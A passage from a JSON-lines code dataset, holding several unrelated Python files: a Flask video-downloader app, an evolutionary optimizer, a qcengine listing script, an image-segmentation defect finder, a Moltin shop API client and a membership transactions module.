title='privacy')\n\n@app.route('/terms-service')\ndef terms():\n return render_template('terms.html', title='terms & service')\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n \n@app.route('/contact', methods=['POST', 'GET'])\ndef con():\n \n if request.method == 'POST':\n flash('SENT', 'success')\n\n return render_template('contact.html', title='contact us')\n\n@app.route('/tk', methods=['POST', 'GET'])\ndef tk():\n \n form = Track(request.form)\n d = request.form.get('d')\n \n if request.method == 'POST':\n try:\n\n \n \n #download_path = YouTube(d, use_oauth = True, allow_oauth_cache=True).streams.get_highest_resolution().download()\n \n #fname = download_path.split(\"//\")[-1]\n opt = {'format': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/mp4'}\n with youtube_dl.YoutubeDL(opt) as ydl:\n \n #r = ydl.download([d])\n r = ydl.extract_info(d, download=True)\n fname = ydl.prepare_filename(r)\n \n return send_file(fname, as_attachment=True)\n \n \n #return send_file(fname, as_attachment=True) \n\n \n \n except Exception as e:\n flash(\"Error Downloading\", 'danger')\n print(e)\n \n \n return render_template('tiktok.html', title='TikTok Downloader')\n@app.route('/fb', methods=['POST', 'GET'])\ndef fb():\n \n form = Track(request.form)\n d = 
request.form.get('d')\n \n if request.method == 'POST':\n try:\n\n \n \n #download_path = YouTube(d, use_oauth = True, allow_oauth_cache=True).streams.get_highest_resolution().download()\n \n #fname = download_path.split(\"//\")[-1]\n opt = {'format': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/mp4'}\n with youtube_dl.YoutubeDL(opt) as ydl:\n \n #r = ydl.download([d])\n r = ydl.extract_info(d, download=True)\n fname = ydl.prepare_filename(r)\n \n return send_file(fname, as_attachment=True)\n \n \n #return send_file(fname, as_attachment=True) \n\n \n \n except Exception as e:\n flash(\"Error Downloading\", 'danger')\n print(e)\n \n \n return render_template('facebook.html', title='Facebook Downloader')\n\n\n\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "olamicreas/tube", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5079, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.abspath", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 24, "usage_type": "call"}, {"api_name": "flask_mail.Mail", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask_mail.Mail", "line_number": 47, "usage_type": "call"}, {"api_name": "forms.Track", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "yt_dlp.YoutubeDL", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 103, "usage_type": "call"}, {"api_name": "forms.Track", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.request.method", 
"line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "yt_dlp.YoutubeDL", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 138, "usage_type": "call"}, {"api_name": "forms.Track", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 142, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 143, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 143, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "yt_dlp.YoutubeDL", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 160, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}]}
+{"seq_id": "3361787908", "text": "from datetime import datetime\n\nimport torch\nfrom torch.optim import Adam\n\nfrom beyondGD.data import batch_loader\nfrom beyondGD.utils import dict_max\n\nfrom beyondGD.optimizer.evolution import elitism, mutate, crossover\n\nfrom beyondGD.optimizer.util import (\n evaluate_on_loader,\n accuracy_on_batch,\n get_rnd_entity,\n get_rnd_prob,\n)\n\nfrom beyondGD.utils.type import TT, IterableDataset, Module, DataLoader\n\n\n#\n#\n# -------- gadam -----------\n#\ndef gadam(\n population: dict,\n train_set: IterableDataset,\n dev_set: IterableDataset,\n learning_rate: float = 1e-2,\n learning_prob: float = 0.5,\n mutation_rate: float = 0.02,\n mutation_prob: float = 0.5,\n crossover_prob: float = 0.5,\n selection_size: int = 10,\n epoch_num: int = 200,\n report_rate: int = 10,\n batch_size: int = 32,\n):\n # enable gradients\n torch.set_grad_enabled(True)\n\n # save population size\n population_size: int = len(population)\n\n # load train set as batched loader\n train_loader: DataLoader = batch_loader(\n train_set,\n batch_size=batch_size,\n )\n\n # load dev set as batched loader\n dev_loader: DataLoader = batch_loader(\n dev_set,\n batch_size=batch_size,\n num_workers=0,\n )\n\n # --\n for epoch in range(1, epoch_num + 1):\n time_begin: datetime = datetime.now()\n\n for batch in train_loader:\n\n # --- calculate accuracy on batch\n population: dict = accuracy_on_batch(population, batch)\n\n # --- select by elite\n selection: dict = elitism(population, selection_size)\n\n # delete old population\n population.clear()\n\n # --- fill new population with mutated, crossed entities\n for _ in range(population_size):\n\n # get random players from selection\n entity: Module = get_rnd_entity(selection)\n\n # (optionally) apply adam\n if learning_prob > get_rnd_prob():\n\n # enable dropout\n entity.train(True)\n\n # choose Adam for optimization\n # https://pytorch.org/docs/stable/optim.html#torch.optim.Adam\n optimizer = Adam(\n entity.parameters(),\n lr=learning_rate,\n )\n optimizer.zero_grad()\n\n # compute loss, backward\n loss: TT = entity.loss(batch)\n loss.backward()\n\n # optimize\n optimizer.step()\n\n # reduce memory usage by deleting loss after calculation\n # https://discuss.pytorch.org/t/calling-loss-backward-reduce-memory-usage/2735\n del loss\n\n # (optionally) cross random players\n if crossover_prob > get_rnd_prob():\n entity.train(False)\n entity: Module = crossover(\n entity, get_rnd_entity(selection)\n )\n\n # (optionally) mutate random players\n if mutation_prob > get_rnd_prob():\n entity.train(False)\n entity: Module = mutate(entity, mutation_rate)\n\n # add to next generation\n population[entity] = 0.0\n\n # --- report\n if epoch % report_rate == 0:\n\n # --- evaluate all models on train set\n population: dict = evaluate_on_loader(population, dev_loader)\n\n # --- find best model and corresponding score\n best, dev_score = dict_max(population)\n\n print(\n \"[--- @{:02}: \\t avg(train)={:2.4f} \\t best(train)={:2.4f} \\t best(dev)={:2.4f} \\t time(epoch)={} ---]\".format(\n epoch,\n sum(population.values()) / len(population),\n best.evaluate(train_loader),\n dev_score,\n datetime.now() - time_begin,\n )\n )\n\n return population\n", "repo_name": "smnmnkr/CL-SoSe21--Bachelor-Thesis-Code", "sub_path": "beyondGD/optimizer/gadam.py", "file_name": "gadam.py", "file_ext": "py", "file_size_in_byte": 4083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": 
"beyondGD.utils.type.IterableDataset", "line_number": 27, "usage_type": "name"}, {"api_name": "beyondGD.utils.type.IterableDataset", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.set_grad_enabled", "line_number": 40, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.DataLoader", "line_number": 46, "usage_type": "name"}, {"api_name": "beyondGD.data.batch_loader", "line_number": 46, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.DataLoader", "line_number": 52, "usage_type": "name"}, {"api_name": "beyondGD.data.batch_loader", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 60, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.accuracy_on_batch", "line_number": 65, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.evolution.elitism", "line_number": 68, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.Module", "line_number": 77, "usage_type": "name"}, {"api_name": "beyondGD.optimizer.util.get_rnd_entity", "line_number": 77, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.get_rnd_prob", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 87, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.TT", "line_number": 94, "usage_type": "name"}, {"api_name": "beyondGD.optimizer.util.get_rnd_prob", "line_number": 105, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.Module", "line_number": 107, "usage_type": "name"}, {"api_name": "beyondGD.optimizer.evolution.crossover", "line_number": 107, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.get_rnd_entity", "line_number": 108, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.get_rnd_prob", "line_number": 112, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.Module", "line_number": 114, "usage_type": "name"}, {"api_name": "beyondGD.optimizer.evolution.mutate", "line_number": 114, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.evaluate_on_loader", "line_number": 123, "usage_type": "call"}, {"api_name": "beyondGD.utils.dict_max", "line_number": 126, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 134, "usage_type": "name"}]}
+{"seq_id": "13440720261", "text": "import json\n\n# This script returns the programs/procedures available in qcengine\n# as a dictionary of {program: version}\n# It is meant to be used with subprocess to get the available programs\n# in a conda environment\n\nif __name__ == \"__main__\":\n try:\n import qcengine\n\n progs = {x: qcengine.get_program(x).get_version() for x in qcengine.list_available_programs()}\n procs = {x: qcengine.get_procedure(x).get_version() for x in qcengine.list_available_procedures()}\n progs[\"qcengine\"] = qcengine.__version__\n\n except ImportError:\n progs = {}\n procs = {}\n\n print(json.dumps({**progs, **procs}))\n", "repo_name": "MolSSI/QCFractal", "sub_path": "qcfractalcompute/qcfractalcompute/run_scripts/qcengine_list.py", "file_name": "qcengine_list.py", "file_ext": "py", "file_size_in_byte": 644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 134, "dataset": "github-code", "pt": "31", "api": [{"api_name": "qcengine.get_program", "line_number": 12, "usage_type": "call"}, {"api_name": "qcengine.list_available_programs", "line_number": 12, "usage_type": "call"}, {"api_name": "qcengine.get_procedure", "line_number": 13, "usage_type": "call"}, {"api_name": "qcengine.list_available_procedures", "line_number": 13, "usage_type": "call"}, {"api_name": "qcengine.__version__", "line_number": 14, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "13764682357", "text": "import os\nimport cv2\nimport numpy as np\nfrom perception.base.seg_group_files import SegGroupFiles\nfrom view.base.img_view import ImgView\nfrom pathlib import Path\n\n\nclass SegUnlabelDefect(SegGroupFiles):\n def __init__(self):\n super(SegUnlabelDefect, self).__init__()\n self._img_view = ImgView()\n # # 保存地址\n self._defect_pic_pathlist_str = \"\"\n\n def show_defect(self, check_ratio=0.7):\n names = self._get_names()\n self._img_view.init()\n self._img_view.set_scale(0.5)\n idx = 0\n while idx < len(names):\n name = names[idx]\n pairs = self.group_file_map[name]\n image_file = pairs[\"image_file\"]\n img_list = self._read_img(name)\n valid_contours, low_conf_norm_area, hist_ratio = self._get_low_confidence_area(name, check_ratio)\n canvas_img = self._calc_canvas_show(img_list, valid_contours, low_conf_norm_area)\n if canvas_img is None:\n idx += 1\n continue\n\n self._img_view.set_image(canvas_img)\n image_file_text = '/'.join(Path(image_file).parts[-3:])\n self._img_view.show_text(point=None, text=image_file_text, color=(0, 0, 255), font_scale=2)\n\n idx, key = self._img_view.show(delay=0)\n\n def export_defect_list(self, save_dir, save_file_name='badcase', check_ratio=0.7):\n self._find_defect(check_ratio)\n os.makedirs(save_dir, exist_ok=True)\n badcase_file = os.path.join(save_dir, save_file_name + \"_labelme.txt\")\n with open(badcase_file, \"w\") as fid:\n fid.writelines(self._defect_pic_pathlist_str)\n\n def _find_defect(self, check_ratio=0.7):\n names = self._get_names()\n for i, name in enumerate(names):\n valid_contours, low_conf_area, hist_ratio = self._get_low_confidence_area(name, check_ratio)\n if low_conf_area > 800 or hist_ratio >= 0.35:\n value = self.group_file_map[name]\n src_path = value[\"image_file\"]\n self._defect_pic_pathlist_str += src_path + \"\\n\"\n print(src_path)\n\n def _calc_canvas_show(self, img_list, valid_contours, low_conf_norm_area):\n cv2.drawContours(img_list[1], valid_contours, -1, (0, 0, 255), 2)\n cv2.drawContours(img_list[2], valid_contours, -1, (0, 0, 255), 2)\n cv2.putText(img_list[1], \"area: \" + str(int(low_conf_norm_area)), (20, 90), 1, 3, (2, 0, 255), 3)\n\n canvas_img = np.zeros((img_list[1].shape[0] * 2, img_list[1].shape[1] * 2, 3), np.uint8)\n canvas_img[:img_list[1].shape[0], :img_list[1].shape[1], :] = img_list[0]\n canvas_img[img_list[1].shape[0]:, img_list[1].shape[1]:, :] = img_list[1]\n canvas_img[:img_list[1].shape[0], img_list[1].shape[1]:, :] = cv2.applyColorMap(255 - img_list[2],\n cv2.COLORMAP_JET)\n return canvas_img\n\n def add_prob_mask(self, image_files):\n print('image origin files has ', len(image_files))\n self.name_order['prob'] = []\n for image_file in image_files:\n name = self.get_name(image_file)\n pairs = self._get_image_pair_map_extend(name)\n pairs[\"prob_mask_file\"] = image_file\n self.name_order['prob'].append(name)\n\n def _read_img(self, file_name):\n value = self.group_file_map[file_name]\n src_path = value[\"image_file\"]\n pred_path = value[\"pred_mask_file\"]\n prob_path = value[\"prob_mask_file\"]\n src_img = cv2.imread(src_path, -1)\n pred_img = cv2.imread(pred_path, -1)\n prob_img = cv2.imread(prob_path, -1)\n # print(src_path, pred_img, prob_path)\n img_list = [src_img, pred_img, prob_img]\n return img_list\n\n def _get_pair_names_list(self):\n # src_img = cv2.imread(src_path, -1)\n # pred_img = cv2.imread(pred_path, -1)\n # prob_img = cv2.imread(prob_path, -1)\n pass\n\n def _preprocess(self, prob_img):\n norm_img_shape = (1280, 720)\n 
min_defect_norm_area = 500\n down_mask_out_ration = 0.08\n img_shape = prob_img.shape[:2]\n min_defect_area = min_defect_norm_area / (norm_img_shape[0] * norm_img_shape[1]) * (img_shape[0] * img_shape[1])\n down_mask_out_area = np.array([[0, int((1 - down_mask_out_ration) * img_shape[0])],\n [img_shape[1], int((1 - down_mask_out_ration) * img_shape[0])],\n [img_shape[1], img_shape[0]],\n [0, img_shape[0]]])\n return down_mask_out_area, min_defect_area\n\n def _find_defect_contours(self, prob_img, min_defect_area, check_ratio=0.7):\n prob_img_show = prob_img.copy()\n img_shape = prob_img.shape[:2]\n norm_img_shape = (1280, 720)\n mask = np.array(prob_img_show < int(check_ratio * 255), np.uint8)\n kernel = np.ones((5, 5), np.uint8)\n binary = cv2.erode(mask, kernel, iterations=1)\n contours, hierarchy = cv2.findContours(binary, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n valid_contours = []\n low_conf_area = 0\n for contour in contours:\n area = cv2.contourArea(contour)\n # 过滤掉小面积\n if area < min_defect_area:\n continue\n # 过滤掉上部分区域\n is_in_contour = cv2.pointPolygonTest(contour, (10, 10), False)\n if (is_in_contour == 1):\n continue\n valid_contours.append(contour)\n low_conf_area += area\n low_conf_norm_area = low_conf_area / (img_shape[0] * img_shape[1]) * (norm_img_shape[0] * norm_img_shape[1])\n return valid_contours, low_conf_norm_area\n\n def _calculate_histgrom(self, cv_img, ratio):\n hist, _ = np.histogram(cv_img, bins=256) # 用numpy包计算直方图\n hist_ratio = np.sum(hist[0:int(ratio * 255)]) / np.sum(hist)\n return hist, hist_ratio\n\n def _get_low_confidence_area(self, file_name, check_ratio=0.7):\n img_list = self._read_img(file_name)\n prob_img = img_list[2]\n down_mask_out_area, min_defect_area = self._preprocess(prob_img)\n prob_img[prob_img == 0] = 255\n valid_contours, low_conf_norm_area = self._find_defect_contours(prob_img, min_defect_area,\n check_ratio=0.7)\n _, hist_ratio = self._calculate_histgrom(prob_img, check_ratio)\n return valid_contours, low_conf_norm_area, hist_ratio\n\n\nif __name__ == '__main__':\n from file.file_list import file_list_main\n from perception.config.seg_select_unlabel_defects_config import untouch_road as SelectConfig\n\n # 原图\n src_img_dir = SelectConfig.get(\"src_img_dir\")\n # 预测彩图\n pred_dir = SelectConfig.get(\"pred_dir\")\n # 预测置信度图\n prob_dir = SelectConfig.get(\"prob_dir\")\n # 保存地址\n save_dir = SelectConfig.get(\"save_dir\")\n\n image_origin_files_all = file_list_main.find_files(src_img_dir, ['png', 'jpg'], recursive=True)\n image_pred_files_all = file_list_main.find_files(pred_dir, ['png', 'jpg'], recursive=True)\n image_prob_files_all = file_list_main.find_files(prob_dir, ['png', 'jpg'], recursive=True)\n\n seg_pic_data = SegUnlabelDefect()\n seg_pic_data.add_image_origin(image_origin_files_all)\n seg_pic_data.add_pred_mask(image_pred_files_all)\n seg_pic_data.add_prob_mask(image_prob_files_all)\n\n seg_pic_data.export_defect_list(save_dir, \"test_demo1\", 0.7)\n\n seg_pic_data.show_defect()\n", "repo_name": "zodiac000/ttt", "sub_path": "perception/seg_script/seg_select_defects_unlabel_batch.py", "file_name": "seg_select_defects_unlabel_batch.py", "file_ext": "py", "file_size_in_byte": 7631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "perception.base.seg_group_files.SegGroupFiles", "line_number": 9, "usage_type": "name"}, {"api_name": "view.base.img_view.ImgView", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 33, 
"usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 60, "usage_type": "attribute"}, {"api_name": "cv2.applyColorMap", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.COLORMAP_JET", "line_number": 64, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.erode", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.pointPolygonTest", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.histogram", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 132, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road.get", "line_number": 151, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road", "line_number": 151, "usage_type": "name"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road.get", "line_number": 153, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road", "line_number": 153, "usage_type": "name"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road.get", "line_number": 155, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road", "line_number": 155, "usage_type": "name"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road.get", "line_number": 157, "usage_type": "call"}, {"api_name": "perception.config.seg_select_unlabel_defects_config.untouch_road", "line_number": 157, "usage_type": "name"}, {"api_name": "file.file_list.file_list_main.find_files", "line_number": 159, "usage_type": "call"}, {"api_name": "file.file_list.file_list_main", "line_number": 159, "usage_type": "name"}, {"api_name": "file.file_list.file_list_main.find_files", "line_number": 160, "usage_type": "call"}, {"api_name": "file.file_list.file_list_main", "line_number": 160, "usage_type": "name"}, {"api_name": "file.file_list.file_list_main.find_files", "line_number": 161, "usage_type": "call"}, {"api_name": "file.file_list.file_list_main", "line_number": 161, "usage_type": "name"}]}
+{"seq_id": "19513335908", "text": "import time\n\nimport requests\n\nEP_ACCESS_TOKEN = None\nEP_TOKEN_LIFETIME = None\n\n\ndef get_ep_access_token(moltin_token):\n now_time = time.time()\n global EP_ACCESS_TOKEN\n global EP_TOKEN_LIFETIME\n\n if not EP_TOKEN_LIFETIME or EP_TOKEN_LIFETIME < now_time:\n EP_ACCESS_TOKEN, EP_TOKEN_LIFETIME = create_ep_access_token(moltin_token)\n\n return EP_ACCESS_TOKEN\n\n\ndef create_ep_access_token(moltin_token):\n url = 'https://api.moltin.com/oauth/access_token'\n data = {\n 'client_id': moltin_token,\n 'grant_type': 'implicit'\n }\n response = requests.post(url, data=data)\n response.raise_for_status()\n response_details = response.json()\n ep_token_lifetime = response_details['expires']\n ep_access_token = response_details['access_token']\n return ep_access_token, ep_token_lifetime\n\n\ndef get_all_products(moltin_token):\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get('https://api.moltin.com/v2/products',\n headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef get_product(moltin_token, product_id):\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(f'https://api.moltin.com/v2/products/{product_id}',\n headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef get_image(moltin_token, image_id):\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(f'https://api.moltin.com/v2/files/{image_id}',\n headers=headers)\n response.raise_for_status()\n image = response.json()['data']['link']['href']\n return image\n\n\ndef add_product_to_cart(moltin_token, cart_id, product_id, quantity):\n url = f'https://api.moltin.com/v2/carts/{cart_id}/items'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n 'Content-Type': 'application/json',\n }\n data = {\"data\":\n { \"id\": product_id,\n \"type\": \"cart_item\",\n \"quantity\": quantity}\n }\n response = requests.post(url, headers=headers, json=data)\n response.raise_for_status()\n return response.json()\n\n\ndef get_cart(moltin_token, cart_id):\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(f'https://api.moltin.com/v2/carts/{cart_id}',\n headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef get_cart_items(moltin_token, cart_id):\n url = f'https://api.moltin.com/v2/carts/{cart_id}/items'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef remove_item_in_cart(moltin_token, cart_id, cart_item_id):\n url = f'https://api.moltin.com/v2/carts/{cart_id}/items/{cart_item_id}'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.delete(url, headers=headers)\n response.raise_for_status()\n return response.json()\n\n\ndef create_customer(moltin_token, name, email):\n url = f'https://api.moltin.com/v2/customers'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n 'Content-Type': 'application/json',\n }\n data = {\"data\":\n 
{\"type\": \"customer\",\n \"name\": name,\n \"email\": email}\n }\n response = requests.post(url, headers=headers, json=data)\n response.raise_for_status()\n return response.json()\n\n\ndef get_customer(moltin_token, user_id):\n url = f'https://api.moltin.com/v2/customers/{user_id}'\n access_token = get_ep_access_token(moltin_token)\n headers = {\n 'Authorization': f'Bearer {access_token}',\n }\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n return response.json()\n", "repo_name": "v1ztep/fish_sale_TG_bot", "sub_path": "moltin.py", "file_name": "moltin.py", "file_ext": "py", "file_size_in_byte": 4407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.time", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 50, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 61, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 80, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 90, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 102, "usage_type": "call"}, {"api_name": "requests.delete", "line_number": 113, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 130, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "74235318489", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\" Simple transcation database access\n\n Connects to the database or emulate a connection\n\n pre-requisite:\n sudo pip3 install PyMySQL\n\n\n sudo systemctl restart httpd\n http://127.0.0.1/phpMyAdmin/\n\n Transactions table:\n --\n-- Table structure for table `transactions`\n--\n\nCREATE TABLE `transactions` (\n `id` int(11) NOT NULL,\n `member_id` int(11) NOT NULL,\n `type` varchar(20) NOT NULL,\n `description` text NOT NULL,\n `amount` float NOT NULL,\n `currency` varchar(4) NOT NULL,\n `valid_from` date NOT NULL,\n `valid_until` date NOT NULL,\n `created_on` datetime NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n--\n-- Indexes for table `transactions`\n--\nALTER TABLE `transactions`\n ADD PRIMARY KEY (`id`);\n\n--\n-- AUTO_INCREMENT for dumped tables\n--\n\n--\n-- AUTO_INCREMENT for table `transactions`\n--\nALTER TABLE `transactions`\n MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;\nCOMMIT;\n\n\"\"\"\n__author__ = \"Eric Gibert\"\n__version__ = \"1.0.20170113\"\n__email__ = \"ericgibert@yahoo.fr\"\n__license__ = \"MIT\"\nfrom datetime import datetime, timedelta, date\nfrom collections import OrderedDict\nfrom model_db import Database\nfrom member import Member\n\nclass Transaction(Database):\n \"\"\"\n A transaction record in the database - SELECT mode only supported\n \"\"\"\n def __init__(self, transac_id=None, member_id=None, *args, **kwargs):\n \"\"\"\n Select a record from the database based on a transactions table id\n :param transac_id: int for transaction table key\n \"\"\"\n super().__init__(table=\"transactions\", *args, **kwargs)\n self.MEMBERSHIP = Member.MEMBERSHIP\n if transac_id:\n self.get_from_db(transac_id)\n elif member_id:\n member = Member(id=member_id)\n default_membership = self.MEMBERSHIP[0]\n valid_from = max(date.today(), member['validity'])\n self.data = OrderedDict([ # ('id', None),\n ('member_id', member_id),\n ('type', default_membership[0]),\n ('description', \"\"),\n ('amount', default_membership[2]),\n ('currency', 'CNY'),\n ('valid_from', valid_from),\n ('valid_until', valid_from+timedelta(days=default_membership[3])),\n ('created_on', datetime.now()) ])\n else:\n self.data = OrderedDict()\n\n def get_from_db(self, transac_id):\n \"\"\"Connects to the database to fetch a transaction table record or simulation\"\"\"\n self.data = self.select(id=transac_id)\n self.id = transac_id\n\n def update_member_status(self, member_id):\n \"\"\"Update the status of a member to OK or NOT_OK accordingly to the mambership payment\"\"\"\n result = self.fetch(\"select max(valid_until) as max_valid from transactions where member_id=%s and right(type,10)='MEMBERSHIP'\", params=(member_id,))\n try:\n new_status = 'OK' if result['max_valid']>=date.today() else 'NOT_OK'\n except TypeError:\n new_status = 'NOT_OK'\n member = Member(member_id=member_id)\n 